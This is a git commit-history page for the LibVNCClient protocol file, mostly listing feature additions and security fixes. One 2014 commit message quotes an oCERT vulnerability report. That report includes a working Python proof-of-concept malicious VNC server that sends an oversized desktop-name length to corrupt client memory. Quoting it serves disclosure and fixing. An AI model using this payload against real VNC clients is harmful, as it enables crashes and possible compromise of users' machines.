summaryrefslogtreecommitdiffstats
path: root/libvncclient/rfbproto.c
Commit message (Collapse)AuthorAgeFilesLines
* Merge tag 'LibVNCServer-0.9.12'Slávek Banko2019-02-061-171/+167
|\ | | | | | | Signed-off-by: Slávek Banko <slavek.banko@axis.cz>
| * LibVNCClient: remove now-useless castChristian Beier2019-01-061-1/+1
| | | | | | | | re #273
| * LibVNCClient: fail on server-sent desktop name lengths longer than 1MBChristian Beier2019-01-061-2/+6
| | | | | | | | re #273
| * Merge pull request #267 from veyon/external-lzoChristian Beier2018-12-291-0/+4
| |\ | | | | | | Allow to use global LZO library instead of miniLZO
| | * Allow to use global LZO library instead of miniLZOTobias Junghans2018-11-221-0/+4
| | | | | | | | | | | | | | | The complete LZO library nowadays is installed on many systems so we can optionally make use of it and omit internal miniLZO implementation.
| * | LibVNCClient: ignore server-sent reason strings longer than 1MBChristian Beier2018-12-291-24/+21
| | | | | | | | | | | | Fixes #273
| * | LibVNCClient: ignore server-sent cut text longer than 1MBChristian Beier2018-12-291-0/+5
| |/ | | | | | | | | This is in line with how LibVNCServer does it (28afb6c537dc82ba04d5f245b15ca7205c6dbb9c) and fixes part of #273.
| * Merge pull request #263 from veyon/custom-auth-handlersChristian Beier2018-11-181-0/+29
| |\ | | | | | | LibVNCClient: add support for custom auth handlers
| | * LibVNCClient: add support for custom auth handlersTobias Junghans2018-11-111-0/+29
| | | | | | | | | | | | | | | This allows to register custom authentication handlers in order to support additional security types.
| * | Merge pull request #261 from veyon/misc-fixesChristian Beier2018-11-071-0/+1
| |\ \ | | | | | | | | Misc fixes
| | * | LibVNCClient: init pad field for set encodings msgTobias Junghans2018-11-061-0/+1
| | |/
| * | common: d3des: drop unused rfbCPKey()Tobias Junghans2018-11-071-1/+0
| |/
| * LibVNCClient: fix three possible heap buffer overflowsChristian Beier2018-09-291-4/+6
| | | | | | | | | | | | | | An attacker could feed `0xffffffff`, causing a `malloc(0)` for the buffers which are subsequently written to. Closes #247
| * LibVNCClient: fix possible infinite loopChristian Beier2018-09-291-1/+1
| | | | | | | | Closes #251
| * LibVNCClient: don't leak uninitialised memory to remoteChristian Beier2018-09-291-0/+2
| | | | | | | | | | | | | | The pad fields of the rfbClientCutTextMsg and rfbKeyEventMsg could contain arbitray memory belonging to the process, don't leak this to the remote. Closes #252
| * When connecting to a repeater, only send initialised stringChristian Beier2018-09-291-2/+6
| | | | | | | | Closes #253
| * Merge pull request #203 from dcommander/turbovnc-clientChristian Beier2018-01-231-13/+0
| |\ | | | | | | Include Tight decoding optimizations from TurboVNC
| | * Include Tight decoding optimizations from TurboVNCDRC2018-01-221-13/+0
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | - As with the encoder, the decoder now uses the TurboJPEG wrapper, which allows it to decode JPEG images directly into the framebuffer. This eliminates a buffer copy (CopyRectangle()) as well as the expensive RGB pixel conversion in DecompressJpegRectBPP(). The TurboJPEG wrapper performs RGB pixel conversion more optimally, and only when necessary (it uses the libjpeg-turbo colorspace extensions when available, in order to avoid RGB conversion.) - The other Tight subencoding types are also now decoded directly into the framebuffer, which eliminates buffer copies. - The Tight decoder now supports the rfbTightNoZlib extension, which allows the server to bypass zlib compression when Compression Level 0 is selected. The encoder already supports this extension. Passing the data stream through zlib when Compression Level 0 is selected needlessly wastes CPU time, since all zlib is doing is copying the data internally into its own structures.
| * | Add trle decoderWiki Wang2017-09-151-0/+63
| |/
| * libvncclient: rename rfbsasl.[c|h] to sasl.[c|h] to be in line with naming ↵Christian Beier2017-09-021-1/+1
| | | | | | | | of other files
| * Move HAVE_SASL #ifdefs into header file to have less LOCChristian Beier2017-09-021-3/+0
| |
| * Added SASL authentication supportsimon2017-06-251-0/+26
| | | | | | | | Added SASL support to OpenSSL
| * Add function pointers for every type of rectangleBalazs Ludmany2016-06-291-103/+3
| |
* | Removed _BSD_SOURCE, _SVID_SOURCE, _GNU_SOURCE, _XOPEN_SOURCE.Michele Calgaro2018-10-081-5/+0
| | | | | | | | Signed-off-by: Michele Calgaro <michele.calgaro@yahoo.it>
* | Merge tag 'LibVNCServer-0.9.11' of https://github.com/LibVNC/libvncserverSlávek Banko2017-10-141-23/+40
|\ \ | | | | | | | | | | | | | | | Conflicts: CMakeLists.txt libvncserver/main.c
| * | Fix building on OSX.Christian Beier2016-11-241-1/+1
| | |
| * | Fix heap overflows in the various rectangle fill functionsJosef Gajdusek2016-11-141-0/+24
| |/ | | | | | | | | | | Altough rfbproto.c does check whether the overall FramebufferUpdate rectangle is too large, some of the individual encoding decoders do not, which allows a malicious server to overwrite parts of the heap.
| * Merge pull request #110 from AlexejStukov/patch-1Christian Beier2016-04-121-1/+2
| |\ | | | | | | break statement out of case
| | * break statement out of caseNorrec2016-04-071-1/+2
| | |
| * | Fix buffer overflow when applying client encodingszbierak2016-04-121-1/+2
| |/
| * Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle()SpaceOne2016-01-271-0/+8
| |
| * Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f.Christian Beier2015-04-171-0/+4
| |
| * Revert "LibVNCClient: Add H.264 encoding for framebuffer updates"Christian Beier2015-04-171-24/+0
| | | | | | | | | | | | | | | | This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c. Conflicts: configure.ac libvncclient/h264.c
| * Merge pull request #69 from nopdotcom/masterChristian Beier2015-04-171-1/+4
| |\ | | | | | | Avoid divide-by-zero in raw encoding (OSX RealVNC)
| | * Avoid divide-by-zero in raw encoding (OSX RealVNC)Jay Carlson2015-03-271-1/+4
| | | | | | | | | | | | | | | | | | | | | | | | | | | OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines. The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | | Add hooks to client library to ontain network and authentication statusTimothy Pearson2015-01-121-6/+41
|/ /
* | Initialize libgcrypt before useFloris Bos2015-01-021-0/+10
|/ | | | | | | | | | | | https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version" Closes issue #45 Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubunutu package) connecting to a Mac Mini. Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption.Christian Beier2014-10-101-1/+2
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client. Field Size --------------------------------- name-length [4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02" conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01" conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel = 0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM = 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding = "\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF + "\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString ) c.close()
* `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-201-1/+6
| | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* MSVC: Use _snprintf instead of snprintfDaniel Cohen Gindi2014-09-021-0/+4
| | | | | | | | | In Microsoft's Visual C runtime, the snprintf() function is actually called _snprintf. Let's just #define the former to call the latter. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix indentationJohannes Schindelin2014-08-161-2/+2
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Check for MallocFrameBuffer() return valuenewsoft2014-08-151-3/+7
| | | | | | If MallocFrameBuffer() returns FALSE, frame buffer pointer is left to NULL. Subsequent writes into that buffer could lead to memory corruption, or even arbitrary code execution.
* Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg.Matthias Treydte2014-06-231-0/+2
|
* libvncclient: If we have TLS support, enable VeNCrypt by defaultJohannes Schindelin2014-04-051-0/+3
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* LibVNCClient: Add H.264 encoding for framebuffer updatesDavid Verbeiren2013-01-251-0/+24
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | This patch implements support in LibVNCClient for framebuffer updates encoded as H.264 frames. Hardware accelerated decoding is performed using VA API. This is experimental support to let the community explore the possibilities offered by the potential bandwidth and latency reductions that H.264 encoding allows. This may be particularly useful for use cases such as online gaming, hosted desktops, hosted set top boxes... This patch only provides the client side support and is meant to be used with corresponding server-side support, as provided by an upcoming patch for qemu ui/vnc module (to view the display of a virtual machine executing under QEMU). With this H.264-based encoding, if multiple framebuffer update messages are generated for a single server framebuffer modification, the H.264 frame data is sent only with the first update message. Subsequent update framebuffer messages will contain only the coordinates and size of the additional updated regions. Instructions/Requirements: * The patch should be applied on top of the previous patch I submitted with minor enhancements to the gtkvncviewer application: http://sourceforge.net/mailarchive/message.php?msg_id=30323804 * Currently only works with libva 1.0: use branch "v1.0-branch" for libva and intel-driver. Those can be built as follows: cd libva git checkout v1.0-branch ./autogen.sh make sudo make install cd .. git clone git://anongit.freedesktop.org/vaapi/intel-driver cd intel-driver git checkout v1.0-branch ./autogen.sh make sudo make install Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
* Include strings.h for strncasecmp(3)Raphael Kubo da Costa2012-09-141-0/+1
|
* Tune the definitions needed when building with -ansi.Raphael Kubo da Costa2012-09-141-0/+1
| | | | | | | | | | | | | The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation. However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdate _POSIX_SOURCE one). _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Fix some compiler warnings that hinted some no too unimportant errors.Christian Beier2012-05-091-2/+2
|
* LibVNCClient: #undef these types in case it's WIN32.Christian Beier2012-05-031-4/+4
| | | | | The various other headers include windows.h and the winsock headers which give an error when SOCKET and socklen_t are already defined.
* Added support for UltraVNC Single Click as originally proposed by Noobius ↵Monkey2012-04-231-0/+8
| | | | | | (Boobius) on 6/1/11. Original thread: http://sourceforge.net/tracker/?func=detail&aid=3310255&group_id=32584&atid=405860
generated by cgit v1.2.1 (git 2.18.0) at 2025-01-07 21:37:34 +0000